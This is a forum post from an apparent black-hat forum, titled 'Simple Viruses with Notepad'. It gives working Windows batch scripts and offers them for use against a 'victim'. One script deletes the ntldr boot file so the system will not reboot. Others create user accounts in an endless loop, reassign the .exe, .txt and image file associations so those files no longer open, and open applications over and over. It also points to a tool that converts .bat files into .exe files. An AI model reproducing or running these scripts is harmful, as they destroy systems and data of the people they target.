50$ /Year And 100$ Life Time VIP ..
Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Simple Viruses with Notepad
TheBoss Offline
Administrator
**********

Administrators

Posts: 106,541
Threads: 99,925
Joined: Feb 2014
Reputation: 32
#1
Simple Viruses with Notepad
Hello everyone i joined today and i want to introduce myself. My name is Nick am from Europe somewhere ^^. Am 20 years old and i hope for a great success here on vhf.

Ok, lets start first of all this is notepad tricks and tips .
I AM NOT RESPONSIBLE OF WHAT HAPPENED TO YOUR COMPUTER
1)Deleting boot files.
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply
Now Paste The Code in Notepad
attrib -S -R -H C:\ntldr
del ntldr
save it as .bat file
Note: After running this batch file , system will not reboot !!

2)User account flooder .
@echo off
:x
net user %random% /add //create user account
goto x
Save As it as anything.bat
Note: This code would start creating windows user accounts whose names could be any random numbers.

3)Extension Changer.
@echo off
assoc .txt=anything
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
Save As it as anything.bat
Note: Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly.
'To see them, just enter command ‘assoc’ in command prompt.'

4)Application Bomber.
:x
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x
save it as .bat
Note: This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.

5)More will come in time there is allot i wanna share but we will go slowly everything in time (peace).

You can download small program that converts .bat to .exe LINK
Spoiler (Click to View)
That's it guyz and girls
I Know, I Know most of you did know about this but this is for newbies and ofc my introduction Smile

Heave fun ^^ Egypt

Okay sorry for last time some of them didn't work now i've tested those and all of them work i will add more in time.

Regards, Sonny

Setting up Home Server
03-28-2014, 04:50 AM
Website Find
Thread Closed 

Forum Jump:


Users browsing this thread: 1 Guest(s)

All the content and Free SEO Tools on BestBlackHatForum.eu is user generated and linked to 3rd party websites. BestBlackHatForum.eu does not host any files at its servers, it basically provides an indexing service. BestBlackHatForum.eu; Its owners and its staff can not be held responsible for any type of content. To remove a link please contact webmaster via Contactus.